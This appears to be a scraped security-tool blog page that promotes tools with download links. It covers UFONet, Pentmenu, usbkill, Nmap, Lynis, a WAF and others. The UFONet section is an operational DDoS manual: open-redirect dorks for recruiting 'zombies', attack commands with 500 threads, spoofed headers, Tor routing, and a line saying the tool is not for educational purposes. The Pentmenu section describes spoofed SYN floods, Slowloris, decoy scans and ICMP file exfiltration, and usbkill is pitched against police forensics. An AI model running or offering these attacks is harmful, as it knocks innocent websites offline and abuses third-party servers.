Open Redirect DDoS Tool - UFONet

UFONet – is a tool designed to launch DDoS attacks against a target, using ‘Open Redirect’ vectors on third party web applications, like botnet. UFONet abuses OSI Layer 7-HTTP to create/manage ‘zombies’ and to conduct different attacks using; GET/POST, multithreading, proxies, origin spoofing methods, cache evasion techniques, etc.  Remember, this tool is NOT for educational purpose. Usage of UFONet for attacking targets without prior mutual consent is illegal. It is the end user’s responsibility to obey all applicable local, state and federal laws.


Developers assume no liability and are not responsible for any misuse or damage caused by this program.


See this links for more info:

• CWE-601:Open Redirect: http://cwe.mitre.org/data/definitions/601.html
• OWASP:URL Redirector Abuse: https://www.owasp.org/index.php/OWASP_Periodic_Table_of_Vulnerabilities_-_URL_Redirector_Abuse2

Installation:

UFONet runs on many platforms. It requires Python (>2.7.9) and the following libraries:

• python-pycurl – Python bindings to libcurl
• python-geoip – Python bindings for the GeoIP IP-to-country resolver library

On Debian-based systems (ex: Ubuntu), run:

sudo apt-get install python-pycurl python-geoip

Source libs:
* Python | * PyCurl | * PyGeoIP

Usage:

  Options:
   --version             show program's version number and exit
   -h, --help            show this help message and exit
   -v, --verbose         active verbose on requests
   --update              check for latest stable version
   --check-tor           check to see if Tor is used properly
   --force-yes           set 'YES' to all questions
   --gui                 run GUI (UFONet Web Interface)

   *Configure Request(s)*:
     --proxy=PROXY       Use proxy server (tor: 'http://127.0.0.1:8118')
     --user-agent=AGENT  Use another HTTP User-Agent header (default SPOOFED)
     --referer=REFERER   Use another HTTP Referer header (default SPOOFED)
     --host=HOST         Use another HTTP Host header (default NONE)
     --xforw             Set your HTTP X-Forwarded-For with random IP values
     --xclient           Set your HTTP X-Client-IP with random IP values
     --timeout=TIMEOUT   Select your timeout (default 10)
     --retries=RETRIES   Retries when the connection timeouts (default 1)
     --threads=THREADS   Maximum number of concurrent HTTP requests (default 5)
     --delay=DELAY       Delay in seconds between each HTTP request (default 0)

   *Search for 'Zombies'*:
     -s SEARCH           Search from a 'dork' (ex: -s 'proxy.php?url=')
     --sd=DORKS          Search from 'dorks' file (ex: --sd 'botnet/dorks.txt')
     --sn=NUM_RESULTS    Set max number of results for engine (default 10)
     --se=ENGINE         Search engine to use for 'dorking' (default: bing)
     --sa                Search massively using all search engines 

   *Test Botnet*:
     -t TEST             Update 'zombies' status (ex: -t 'botnet/zombies.txt')
     --attack-me         Order 'zombies' to attack you (NAT required!)
 
   *Community*:
     --download-zombies  Download 'zombies' from Community server
     --upload-zombies    Upload your 'zombies' to Community server
     --blackhole         Create a 'blackhole' to share your 'zombies'
     --up-to=UPIP        Upload your 'zombies' to a 'blackhole'
     --down-from=DIP     Download your 'zombies' from a 'blackhole'

   *Research Target*:
     -i INSPECT          Search biggest file (ex: -i 'http(s)://target.com')

   *Configure Attack(s)*:
     --no-head           Disable check of target's status at start
     --disable-isup      Disable round check status: 'is target up?'
     --disable-aliens    Disable 'aliens' web abuse of test services
     --disable-droids    Disable 'droids' redirectors
     -r ROUNDS           Set number of rounds (default: 1)
     -b PLACE            Set place to attack (ex: -b '/path/big.jpg')
     -a TARGET           Start Web DDoS attack (ex: -a 'http(s)://target.com')

   *Special Attack(s)*:
     --db=DBSTRESS       Set db stress input point (ex: --db 'search.php?q=')

Examples:

Searching for ‘zombies’:

UFONet can dig on different search engines results to find possible ‘Open Redirect’ vulnerable sites. A common query string should be like this:

'proxy.php?url='
'check.cgi?url='
'checklink?uri='
'validator?uri='

For example you can begin a search with:

./ufonet -s 'proxy.php?url='

Or providing a list of “dorks” from a file:

./ufonet --sd 'botnet/dorks.txt'

By default UFONet will uses a search engine called ‘bing’. But you can choose a different one:

./ufonet -s 'proxy.php?url=' --se 'bing'

This is the list of available search engines with last time that were working:

- bing [17/08/2016: OK!]
- yahoo [17/08/2016: OK!]

You can also search massively using all search engines supported:

./ufonet -s 'proxy.php?url=' --sa

To control how many ‘zombies’ receive from search engines you can use:

./ufonet --sd 'botnet/dorks.txt' --sa --sn 20

At the end of the process, you will be asked if you want to check the list retrieved to see if the urls are vulnerable.

Wanna check if they are valid zombies? (Y/n)

Also, you will be asked to update the list adding automatically only ‘vulnerable’ web apps.

Wanna update your list (Y/n)

If you reply ‘Y’ your new ‘zombies’ will be appended to the file named: zombies.txt

Examples:

+ with verbose:     ./ufonet -s 'proxy.php?url=' -v
+ with threads:     ./ufonet --sd 'botnet/dorks.txt' --sa --threads 100

Testing botnet:

Open ‘zombies.txt’ (or another file) and create a list of possible ‘zombies’.
Urls of the ‘zombies’ should be like this:

http://target.com/check?uri=

After that, launch it:

./ufonet -t 'botnet/zombies.txt'

You can order to ‘zombies’ to attack you and see how they reply to your needs using:

./ufonet --attack-me

At the end of the process you will be asked if you want to update the list adding automatically only ‘vulnerable’ web apps.

Wanna update your list (Y/n)

If you reply ‘Y’, your file: zombies.txt will be updated.

Examples:

+ with verbose:     ./ufonet -t 'botnet/zombies.txt' -v
+ with proxy TOR:   ./ufonet -t 'botnet/zombies.txt' --proxy="http://127.0.0.1:8118"
+ with threads:     ./ufonet -t 'botnet/zombies.txt' --threads 50

Inspecting a target:

This feature will provides you the biggest file on target:

./ufonet -i http://target.com

You can use this when attacking to be more effective:

./ufonet -a http://target.com -b "https://cdn-cyberpunk.netdna-ssl.com/biggest_file_on_target.xxx"

Example:

+input:

./ufonet -i http://target.com

+output:

       [...]

        +Image found: images/wizard.jpg
 (Size: 63798 Bytes)
 ------------
 +Style (.css) found: fonts.css
 (Size: 20448 Bytes)
 ------------
 +Webpage (.php) found: contact.php
 (Size: 2483 Bytes)
 ------------
 +Webpage (.php) found: about.php
 (Size: 1945 Bytes)
 ------------
 +Webpage (.php) found: license.php
 (Size: 1996 Bytes)
 ------------
 ================================================================================
 =Biggest File: http://target.com/images/wizard.jpg
 ================================================================================

Attacking a target:
Enter a target to attack with a number of rounds:

./ufonet -a http://target.com -r 10

On this example UFONet will attacks the target a number of 10 times for each ‘zombie’. That means that if you have a list of 1.000 ‘zombies’ it will launchs 1.000 ‘zombies’ x 10 rounds = 10.000 requests to the target.

By default if you don’t put any round it will apply only 1.

Additionally, you can choose a place to reload on target’s site. For example, a large image, a big size file or a flash movie. In some scenarios where targets doesn’t use cache systems this will do the attack more effective.

./ufonet -a http://target.com -b "/images/big_size_image.jpg"

Examples:

     + with verbose:     ./ufonet -a http://target.com -r 10 -v
     + with proxy TOR:   ./ufonet -a http://target.com -r 10 --proxy="http://127.0.0.1:8118"
     + with a place:     ./ufonet -a http://target.com -r 10 -b "/images/big_size_image.jpg"
     + with threads:     ./ufonet -a http://target.com -r 10 --threads 500

Download UFONet

Read More

Nmap Security Scanner - #1 Mind Map

Nmap (Network Mapper) is a security scanner originally written by Gordon Lyon (also known by his pseudonym Fyodor Vaskovich) used to discover hosts and services on a computer network, thus creating a "map" of the network. To accomplish its goal, Nmap sends specially crafted packets to the target host and then analyzes the responses.


By OffSec

Read More

Simple Static Malware Analyzer - SSMA

SSMA is a simple malware analyzer written in Python 3.

Features:

• Searches for websites, e-mail addresses, IP addresses in the strings of the file.
  
• Looks for Windows functions commonly used by malware.
  
• Get results from VirusTotal and/or upload files.
  
• Malware detection based on Yara-rules - https://virustotal.github.io/yara/
  
• Detect well-known software packers.
  
• Detect the existence of cryptographic algorithms.
  
• Detect anti-debug and anti-virtualization techniques used by malware to evade automated analysis.
  
• Find if documents have been crafted to leverage malicious code.
  

Usage

git clone https://github.com/secrary/SSMA

cd SSMA

sudo pip3 install -r requirements.txt

python3 ssma.py -h

Additional: ssdeep - Installation
More: Simple Static Malware Analyzer

Download SSMA

Read More

A simple Bash Script for Recon and DOS Attacks - Pentmenu

A bash script inspired by pentbox.

Designed to be a simple way to implement various network pentesting functions, including network attacks, using wherever possible readily available software commonly installed on most linux distributions without having to resort to multiple specialist tools.

Sudo is implemented where necesssary.
Tested on Debian and Arch.

Requirements:

• bash
  
• sudo
  
• curl
  
• netcat (must support '-k' option, openbsd variant recommended)
  
• hping3 (or nping can be used as a substitute for flood attacks)
  
• openssl
  
• stunnel
  
• nmap
  
• whois (not essential but preferred)
  

How to use?

• Download the script:

$ wget https://raw.githubusercontent.com/GinjaChris/pentmenu/master/pentmenu

• Make it executable:

$ chmod +x ./pentmenu

• Run it:

$ ./pentmenu

Alternatively, use git clone, or download the latest release from https://github.com/GinjaChris/pentmenu/releases , extract it and run the script.

More detail

RECON MODULES

• Show IP - uses curl to perform a lookup of your external IP. Runs ip a or ifconfig (as appropriate) to show local interface IP's.
  
• DNS Recon - passive recon, performs a DNS lookup (forward or reverse as appropriate for target input) and a whois lookup of the target. If whois is not available it will perform a lookup against ipinfo.io (only works for IP's, not hostnames).
  
• Ping Sweep - uses nmap to perform an ICMP echo (ping) against the target host or network.
  
• Network Recon - uses nmap to identify live hosts, open ports, attempts OS identification, grabs banners/identifies running software version and attempts OS detection. Nmap will not perform a ping sweep prior as part of this scan. Nmap's default User-Agent string is changed to that of IE11 in this mode, to help avoid detection via HTTP. This scan can take a long time to finish, please be patient.
  
• Stealth Scan - TCP Port scanner using nmap to scan for open ports using TCP SYN scan. Nmap will not perform a ping sweep prior to performing the TCP SYN scan. This scan can take a long time to finish, please be patient.
  
• UDP scan - uses nmap to scan for open UDP ports.
  
• Check Server Uptime - estimates the uptime of the target by querying an open TCP port with hping. Accuracy of the results varies from one machine to another.
  

DOS MODULES

• TCP Syn Flood - sends a flood of TCP SYN packets using hping3. If hping3 is not found, it attempts to use the nmap-nping utility instead. Hping3 is preferred since it sends packets as fast as possible. Options are provided to use a source IP of your interface, or specify (spoof) a source IP, or spoof a random source IP for each packet. Optionally, you can add data to the SYN packet. All SYN packets have the fragmentation bit set and use hpings virtual MTU of 16 bytes, guaranteeing fragmentation. Falling back to nmap-nping means sending X number of packets per second until Y number of packets is sent and only allows the use of interface IP or a specified (spoofed) source IP. 
  A TCP SYN flood is unlikely to break a server, but is a good way to test switch/router/firewall infrastructure and state tables. 
• UDP Flood - much like the TCP SYN Flood but instead sends UDP packets to the specified host:port. Like the TCP SYN Flood function, hping3 is used but if it is not found, it attempts to use nmap-nping instead. All options are the same as TCP SYN Flood, except you can specify data to send in the UDP packets. Again, this is a good way to check switch/router throughput or to test VOIP systems.
  
• SSL DOS - uses OpenSSL to attempt to DOS a target host:port. It does this by opening many connections and causing the server to make expensive handshake calculations. This is not a pretty or elegant piece of code, do not expect it to stop immediately upon pressing 'Ctrl c', but it can be brutally effective. 
  The option for client renegotiation is given; if the target server supports client initiated renegotiation, this option should be chosen. Even if the target server does not support client renegotiation (for example CVE-2011-1473), it is still possible to impact/DOS the server with this attack. 
  It is very useful to run this against loadbalancers/proxies/SSL-enabled servers (not just HTTPS!) to see how they cope under the strain. 
• Slowloris - uses netcat to slowly send HTTP Headers to the target host:port with the intention of starving it of resources. This is effective against many, although not all, HTTP servers, provided the connections can be held open for long enough. Therefore this attack is only effective if the server does not limit the time available to send a complete HTTP request. Some implementations of this attack use clearly identifiable headers which is not the case here. The number of connections to open to the target is configurable. The interval between sending each header line is configurable, with the default being a random value between 5 and 15 seconds. The idea is to send headers slowly, but not so slow that the servers idle timeout closes the connection. The option to use SSL (SSL/TLS) is given, which requires stunnel.
  

Defences against this attack include (but are not limited to):

Limiting the number of TCP connections per client; this will prevent a single machine from making the server unavailable, but is not effective if say, 10,000 clients launch the attack simultaneously. Additionally, such a defensive measure may negatively impact multiple (legitimate) clients operating behind a forward proxy server.

Limiting the time available to send a complete HTTP request; this is effective since the attack relies on slowly sending headers to the server (the server should await all headers from the client before responding). If the server limits the time for receiving all headers of a request to 10 seconds (for example) it will severely limit the effectiveness of the attack. It is possible that such a measure will prevent legitimate clients over slow/lossy connections from accessing the site.

• Distraction Scan - this is not really a DOS attack but simply launches multiple TCP SYN scans, using hping, from a spoofed IP of your choosing (such as the IP of your worst enemy). It is designed to be an obvious scan in order to trigger any lDS/IPS the target may have and so hopefully obscure any actual scan or other action that you may be carrying out.

EXTRACTION MODULES

• File extraction via ICMP - This module uses hping to send data with ICMP packets. It can be extremely useful where only ICMP connectivity is possible.
  
• File receipt via ICMP - This module uses hping to listen for ICMP packets and record the data to an output file of your choice. It will only record packet data starting with the secret that you define. Therefore the extractor and receiver must use an identical secret.
  

An alternative to using this receiver is to run wireshark to capture the inbound icmp packets, which seems quite happy to reconstruct the data received over several fragmented ICMP packets.

• Listener - uses netcat to open a listener on a configurable TCP or UDP port. This can be useful for testing syslog connectivity, receive files or checking for active scanning on the network. Anything received by the listener is written out to ./pentmenu.listener.out.

Disclaimer
This script is only for responsible, authorised use. You are responsible for your own actions and this script is provided without warranty or guarantee of any kind. The author(s) accept no responsibility or liability on your behalf.

Also see
Pentmenu is available as a package on Arch Linux. Big love to ArchStrike and Parrot linux .

Download Pentmenu

Read More

The Best Penetration Testing Distribution - Kali Linux 2016.2

This release brings a whole bunch of interesting news and updates into the world of Kali.

New KDE, MATE, LXDE, e17, and Xfce Builds

Although users are able to build and customize their Kali Linux ISOs however they wish, we often hear people comment about how they would love to see Kali with $desktop_environment instead of GNOME. We then engage with those people passionately, about how they can use live-build to customize not only their desktop environment but pretty much every aspect of their ISO, together with the ability to run scripted hooks at every stage of the ISO creation process – but more often than not, our argument is quickly lost in random conversation. As such, we’ve decided to expand our “full” 64bit releases with additional Desktop Environment flavored ISOs, specifically KDE, Mate, LXDE and Enlightenment. These can now be downloaded via our Kali Download page. For those curious to see what the various Desktop Environments look like, we’ve taken some screenshots for you:

Gnome

E17

KDE

LXDE

Mate

Xfce

Kali Linux Weekly ISOs

Constantly keeping Kali on the bleeding edge means frequent updates to packages on an ongoing basis. Since our last release several months ago, there’s a few hundred new or updated packages which have been pushed to the Kali repos. This means that anyone downloading an ISO even 3 months old has somewhat of a long “apt-get dist-upgrade” ahead of them. To help avoid this situation, from this release onwards, we’ll be publishing updated weekly builds of Kali that will be available to download via our mirrors. Speaking of mirrors, we are always in need of support in this area – if you’re capable of running a high-bandwidth mirror and would like to support our project, please check out our Kali Mirrors page.

Bug Fixes and OS Improvements

During these past few months, we’ve been busy adding new relevant tools to Kali as well as fixing various bugs and implementing OS enhancements. For example, something as simple as adding HTTPS support in busybox now allows us to preseed Kali installations securely over SSL. This is a quick and cool feature to speed up your installations and make them (almost) unattended, even if you don’t have a custom built ISO.

To set a preseed file during an install process, choose the “install” option, then hit “tab” and enter the preseed directive, together with a URL pointing to your actual preseed file.

preseed/url=https://www.kali.org/dojo/preseed.cfg

Read more here.

Download Kali Linux 2016.2

Read More

Steganography Application (Data Hiding and Watermarking) - OpenStego

OpenStego is a steganography application that provides two functionalities:

1. Data Hiding: It can hide any data within a cover file (e.g. images).
   
2. Watermarking: Watermarking files (e.g. images) with an invisible signature. It can be used to detect unauthorized file copying. 

Usage

• For GUI:

     java -jar lib\openstego.jar    

OR
Use the bundled batch file or shell script to launch the GUI.

• For command line interface:

Refer to online documentation .

Plugins help
Please use the following command to get plugin specific help:

   java -jar lib\openstego.jar -help -a <algorithm_name>   

Developing new plugin
To add a new plugin, the following abstract class must be implemented:
net.sourceforge.openstego.OpenStegoPlugin
Read the API documentation for the details of the methods to be implemented. In addition, the following utility class can be used to handle multilingual string labels for the plugin:
net.sourceforge.openstego.util.LabelUtil
A new namespace should be added to LabelUtil class for each new plugin. Same namespace can also be used for exception messages while throwing OpenStegoException .
After implementing the plugin classes, create new file named OpenStegoPlugins.external and put the fully qualified name of the class which implements OpenStegoPlugin in the file. Make sure that this file is put directly under the CLASSPATH while invoking the application.
Please refer to the net.sourceforge.openstego.plugin.lsb package sources for sample plugin implementation.

Author
Samir Vaidya (syvaidya [at] gmail)
Copyright (c) 2007-2015

See Also
Project homepage: http://www.openstego.com
Blog: http://syvaidya.blogspot.com

Download OpenStego

Read More

Top List Password - Word List 10 Million Passwords

In cryptography, a brute-force attack consists of an attacker trying many passwords or passphrases with the hope of eventually guessing correctly. The attacker systematically checks all possible passwords and passphrases until the correct one is found. Alternatively, the attacker can attempt to guess the key which is typically created from the password using a key derivation function. This is known as an exhaustive key search.

A brute-force attack is a cryptanalytic attack that can, in theory, be used to attempt to decrypt any encrypted data (except for data encrypted in an information-theoretically secure manner). Such an attack might be used when it is not possible to take advantage of other weaknesses in an encryption system (if any exist) that would make the task easier.

When password guessing, this method is very fast when used to check all short passwords, but for longer passwords other methods such as the dictionary attack are used because a brute-force search takes too long. Longer passwords, passphrases and keys have more possible values, making them exponentially more difficult to crack than shorter ones.

Brute-force attacks can be made less effective by obfuscating the data to be encoded making it more difficult for an attacker to recognize when the code has been cracked or by making the attacker do more work to test each guess. One of the measures of the strength of an encryption system is how long it would theoretically take an attacker to mount a successful brute-force attack against it.

Brute-force attacks are an application of brute-force search, the general problem-solving technique of enumerating all candidates and checking each one.

Source: Wikipedia 

VirusTotal

Pass: offsec

By: OffSec

Download Word List

Read More

Anti-forensic Kill-switch - usbkill

usbkill  is an anti-forensic kill-switch that waits for a change on your USB ports and then immediately shuts down your computer.

To run:

sudo python usbkill.py

or

sudo python3 usbkill.py

Related project; same idea, but implemented as a Linux driver: https://github.com/NateBrune/silk-guardian

Why?

Some reasons to use this tool:

º In case the police or other thugs come busting in (or steal your laptop from you when you are at a public library, as happened to Ross). The police commonly uses a  mouse jiggler  to keep the screensaver and sleep mode from activating.
º You don’t want someone to add or copy documents to or from your computer via USB.
º You want to improve the security of your (encrypted) home or corporate server (e.g. Your Raspberry).

[!] Important: Make sure to use disk encryption for all folders that contain information you want to be private. Otherwise they will get it anyway. Full disk encryption is the easiest and surest option if available

Tip: Additionally, you may use a cord to attach a USB key to your wrist. Then insert the key into your computer and start usbkill. If they steal your computer, the USB will be removed and the computer shuts down immediately.

Feature List

(version 1.0-rc.4)

º Compatible with Linux, *BSD and OS X.
º Shutdown the computer when there is USB activity.
º Customizable. Define which commands should be executed just before shut down.
º Ability to whitelist a USB device.
º Ability to change the check interval (default: 250ms).
º Ability to melt the program on shut down.
º RAM and swap wiping.
º Works with sleep mode (OS X).
º No dependency except secure-delete iff you want usbkill to delete files/folders for you or if you want to wipe RAM or swap. sudo apt-get install secure-delete
º Sensible defaults

Supported command line arguments (partially for devs):

º -h or --help: show help message, exit.
º --version: show version of the program, exit.
º --no-shut-down: if a malicious change on the USB ports is detected, execute all the (destructive) commands you defined in settings.ini, but don’t turn off the computer.
º --cs: Copy program folder settings.ini to /etc/usbkill/settings.ini

Contact

hephaestos@riseup.net - PGP/GPG Fingerprint: 8764 EF6F D5C1 7838 8D10 E061 CF84 9CE5 42D0 B12B

Download usbkill

Read More

A Libre Cross-Platform Disassembler - Panopticon

Panopticon is a cross platform disassembler for reverse engineering written in Rust. Panopticon has functions for disassembling, analysing decompiling and patching binaries for various platforms and instruction sets.

Panopticon comes with GUI for browsing control flow graphs, displaying analysis results, controlling debugger instances and editing the on-disk as well as in-memory representation of the program.

Building

Panopticon builds with Rust stable. The only dependencies aside from a working Rust 1.7 toolchain and Cargo you need Qt 5.4 installed.

Linux
Install Qt using your package manager.
Ubuntu 15.10 and 16.04:

sudo apt install qt5-default qtdeclarative5-dev \
                 qml-module-qtquick-controls qml-module-qttest \
                 qml-module-qtquick2 qml-module-qtquick-layouts \
                 qml-module-qtgraphicaleffects \
                 qtbase5-private-dev pkg-config \
                 git build-essential cmake

Fedora 22 and 23:

sudo dnf install qt5-qtdeclarative-devel qt5-qtquickcontrols \
                 qt5-qtgraphicaleffects

After that clone the repository onto disk and use cargo to build everything.

git clone https://github.com/das-labor/panopticon.git
cd panopticon
cargo build

Gentoo:

layman -a rust
layman -f -o https://raw.github.com/das-labor/labor-overlay/master/labor-overlay -a labor-overlay

emerge -av panopticon

Windows
Install the Qt 5.4 SDK and the Rust toolchain Panopticon can be build using  cargo build.

Running
The current version only supports AVR and has no ELF or PE loader yet. To test Panopticon you need relocated AVR code. Such a file is prepared in  tests/data/sosse.

Contributing
Panopticon is licensed under GPLv3 and is Free Software. Hackers are always welcome. See https://panopticon.re for our project documentation. Panopticon uses Github for issue tracking: https://github.com/das-labor/panopticon/issues

Contact
IRC: #panopticon on Freenode. Twitter: @_cibo_

Download Panopticon

Read More

Web Application Firewall using DFA - Raptor WAF v0.2

Raptor WAF is a simple web application firewall made in C, using KISS principle, to make poll use select() function, is not better than epoll() or kqueue() from *BSD but is portable,  the core of match engine using DFA to detect XSS, SQLi and path traversal.

No more words, look at the following :

WAF stands for Web Application Firewall. It is widely used nowadays to detect and defend SQL Injections and XSS...

• You can block XSS, SQL injection attacks and path traversal with Raptor
• You can use blacklist of IPs to block some users at config/blacklist ip.txt
• You can use IPv6 and IPv4 at communications
• At the future DoS protector, request limit, rule interpreter and Malware detector at uploads.
• At the future SSL/TLS...

to run:

$ git clone https://github.com/CoolerVoid/raptor_waf
$ cd raptor_waf; make; bin/raptor

Example

Up some HTTPd server at port 80

$ bin/Raptor -h localhost -p 80 -r 8883 -w 4 -o loglog.txt

you can test at http://localhost:8883/test.php

Look the docs

https://github.com/CoolerVoid/raptor_waf/blob/master/doc/raptor.pdf

Tests:

509 of attacks, detect and block 349, 68% of attacks blocked

Steps to create your WAF(web application firewall) in C

Following definition (like OWASP), a WAF is a piece of software intended to protect a web app that is on the level of the application. nowadays, a WAF is not defined by the web app, it’s not a customized solution specific to that application but similarly to a general software firewall, where one that contains parameters to protect against intrusion in a wide variety of frameworks and codes. Trying clear your mind, there is overlap between the different types of firewalls. Software and hardware firewalls are used in their own right to protect networks. However, WAFs with their specialized function for web applications, can take the form input of either of those two main types. Per default, a firewall uses a blacklist, protecting against an individual, previously logged attacks. Additionally, it can also use a white list, providing allowable users and instances of interaction for the application, another function is block SQL Injection attacks and XSS attacks… Another context  WAFs can create random tokens and put in forms to try blocks web robots and automated attacks, this practice can try mitigate CSRF pitfalls. Before you ask “How i can do  it?”, i gotta bring to you some principles, anyway the theory around facts…

Have two common WAFs:

1- Uses plugin in HTTPd to get information of data INPUT or OUTPUT, before finish he gets the request and block some contents, this function focuses at HTTP METHODs POST, GET…  

 2- This way, is my favorite, is a independent reverse proxy server, he bring all requests of the client to the proxy, the proxy makes some analysis in the content, if not block, he send all the information to the external server… 

  

Number One is a cold, this path is not fully portable… other bad thing you need create a diferent plugin each HTTPd, something to apache another to NGINX, IIs, lighttpd…  its not cool! If you are not a good low level programmer… you can try use twisted of python, is easy make reverse proxy with it, but is not good way, because not have good performance in production… if you piss off for it, study the Stevens book of sockets. Its OK, the title of this post is “create waf in C”, Task fully done here and commented and with some documentations in LaTex… relax, you can get it in this repository:

Download Raptor

Read More

Security Auditing Tool for Unix/Linux Systems - Lynis 2.3.2

We are excited to announce this major release of auditing tool Lynis. Several big changes have been made to core functions of Lynis. These changes are the next of simplification improvements we made. There is a risk of breaking your existing configuration.

Lynis is an open source security auditing tool. Used by system administrators, security professionals, and auditors, to evaluate the security defenses of their Linux and UNIX-based systems. It runs on the host itself, so it performs more extensive security scans than vulnerability scanners.

Supported operating systems

The tool has almost no dependencies, therefore it runs on almost all Unix based systems and versions, including:

• AIX
• FreeBSD
• HP-UX
• Linux
• Mac OS
• NetBSD
• OpenBSD
• Solaris
• and others

It even runs on systems like the Raspberry Pi and several storage devices!

Installation optional

Lynis is light-weight and easy to use. Installation is optional: just copy it to a system, and use "./lynis audit system" to start the security scan. It is written in shell script and released as open source software (GPL). 

How it works

Lynis performs hundreds of individual tests, to determine the security state of the system. The security scan itself consists of performing a set of steps, from initialization the program, up to the report.

Steps

1. Determine operating system
2. Search for available tools and utilities
3. Check for Lynis update
4. Run tests from enabled plugins
5. Run security tests per category
6. Report status of security scan

Besides the data displayed on screen, all technical details about the scan are stored in a log file. Any findings (warnings, suggestions, data collection) are stored in a report file.

Opportunistic scanning

Lynis scanning is opportunistic: it uses what it can find.

For example if it sees you are running Apache, it will perform an initial round of Apache related tests. When during the Apache scan it also discovers a SSL/TLS configuration, it will perform additional auditing steps on that. While doing that, it then will collect discovered certificates, so they can be scanned later as well.

In-depth security scans

By performing opportunistic scanning, the tool can run with almost no dependencies. The more it finds, the deeper the audit will be. In other words, Lynis will always perform scans which are customized to your system. No audit will be the same!

Use cases

Since Lynis is flexible, it is used for several different purposes. Typical use cases for Lynis include:

• Security auditing
• Compliance testing (e.g. PCI, HIPAA, SOx)
• Vulnerability detection and scanning
• System hardening

Resources used for testing

Many other tools use the same data files for performing tests. Since Lynis is not limited to a few common Linux distributions, it uses tests from standards and many custom ones not found in any other tool.

• Best practices
• CIS
• NIST
• NSA
• OpenSCAP data
• Vendor guides and recommendations (e.g. Debian Gentoo, Red Hat)

Lynis Plugins

lugins enable the tool to perform additional tests. They can be seen as an extension (or add-on) to Lynis, enhancing its functionality. One example is the compliance checking plugin, which performs specific tests only applicable to some standard.


Changelog

Categories and Groups

Tests are now grouped by their focus area and named 'groups' accordingly. Besides groups, each test will belong to a category (performance, privacy, or security).
Commands: lynis show categories, lynis show groups Options: --tests-from-category, --tests-from-group
Note: You might need to change your scripts if you previously defined the group of tests to scan.
Development

---

A new 'strict' option is available in the profiles and by default enabled for the initialization phases of Lynis. It will perform a strict code check for the tests, to detect any uninitialized variables, improving code quality.

Helpers

With 'lynis update check' you can now check for updates. This is the preferred new method.
The command 'lynis show changelog' allows reviewing the changes. Optionally a release can be specified as additional argument.

Languages

Initial translation for German has been contributed by Kai Raven. The Italian translation by Stefano Marty (stefanomarty). Hungarian translation by Zoltan Paldi (paldiz)

Profiles

Parsing of the profiles has been improved, which prevented some settings from overriding default settings.

Tests

• AUTH-9212 - Added prerequisite to log
• AUTH-9216 - Simplified test and make it more efficient
• AUTH-9218 - Clean ups and improve readability
• AUTH-9226 - Style, text, and removed warning
• AUTH-9228 - Provide just a suggestion instead of warning
• AUTH-9268 - Improve test for readability
• AUTH-9328 - Test /etc/profile.d for umask setting
• AUTH-9406 - Readability and code style changes
• CONT-8102 - Determine if all Docker tests should be performed
• DBS-1880 - Initial support for Redis server
• HTTP-6720 - Readability improvement of test
• KRNL-5830 - Readability and style improvements, ignore rescue images
• MAIL-8818 - Style and refactoring
• PHP-2211 - Readability improvement and code style changes
• PHP-2374 - Changed text and cleanups
• PHP-2376 - Log result to log file instead of report
• PKGS-7383 - Simplified test
• PKGS-7388 - Style and readability improvements
• TIME-3106 - Corrected string to test for status
• TOOL-5102 - Split of fail2ban tests
• TOOL-5104 - Test for enabled fail2ban jails

Languages

Translation of Spanish (es) added Proper display of text strings when accented characters are used More text strings added

General

• Added bold and header as new colors
• Changed header and footer of screen output
• Allow atomic tests to be skipped (e.g. SSH-7408)
• Extended tests database with category (lynis show tests)
• By default Lynis will now run in 'quick mode' and not break after each section. You can get this behavior by adding the --wait option.

Functions

• RemoveColors - New test to clear colors
• DisplayError - Display error on screen in uniform format and colors Use an optional exit code to quit the program
• SkipAtomicTest - This function is now properly working with lowercase strings

Website

Several controls on the website are added or updated, including:

• FILE-6344
• FINT-4315
• FINT-4402
• HTTP-6714
• MACF-6234
• NAME-4018
• NAME-4402
• PHP-2374
• PROC-3612
• TIME-3106

Download Lynis 2.3.2

Read More

Tonight Mr. Robot is Going to Reveal ‘Dream Device For Hackers’

Mr. Robot is the rare show that provides a realistic depiction of hacks and vulnerabilities that are at the forefront of cyber security. This is the reason it’s been the most popular TV show of its kind.

Throughout season 1 and season 2, we have seen that connected devices are the entry point of choice of Elliot and fsociety to breach networks and traditional security controls.

Pwn Phone On Mr. Robot Show

In this week’s episode, Elliot uses a Pwnie Express Pwn Phone, which he describes as “a dream device for pentester,” to run a custom script he has written to take over someone else’s phone.

Security pros have long know about the Pwn Phone as a powerful mobile platform for penetration testing and security assessments, so it is not surprising to see it on Mr. Robot.

The coolest part is that Pwnie Express is giving away a Pwn Phone, just like the one used in the show.

The Pwn Phone is a mobile pentesting device that makes it incredibly easy to evaluate wired, wireless and Bluetooth networks. It is built on Kali Linux that comes pre-packaged with over 100 built-in and ‘one-click’ tools, and it can run third-party scripts.

The Pwn Pad exists for security pros who want a tablet version, and it’s also available via the Android Open Pwn Project.

The Pwn Phone is the latest in a series of connected device hacks on Mr. Robot that have included a Femtocell, a Raspberry Pi, and Bluetooth sniffers, along with the hack of an E-Corp exec’s connected home and the crucial meltdown of E-Corp’s data center by using a connected HVAC system.

These are real threats that are being exploited by criminals to gain unauthorized access and steal data from companies today.

In the past, Pwnie has made it clear that they do not condone the criminal use of penetration testing tools and devices. But pentesting is important, and having the tools to do it properly is part of that process.

Sometimes you need to break things to find and fix serious security vulnerabilities in the devices and networks that permeate nearly every facet of our daily lives. The bad guys have every tool available to them; white hats should be equally well-equipped.

And as for what Elliot does in the show?

He’s a pretty well-established gray character. Is he good? Or is he bad?

Either way, it was pretty cool.

Source: Tha Hackers News

OffensiveSec

Read More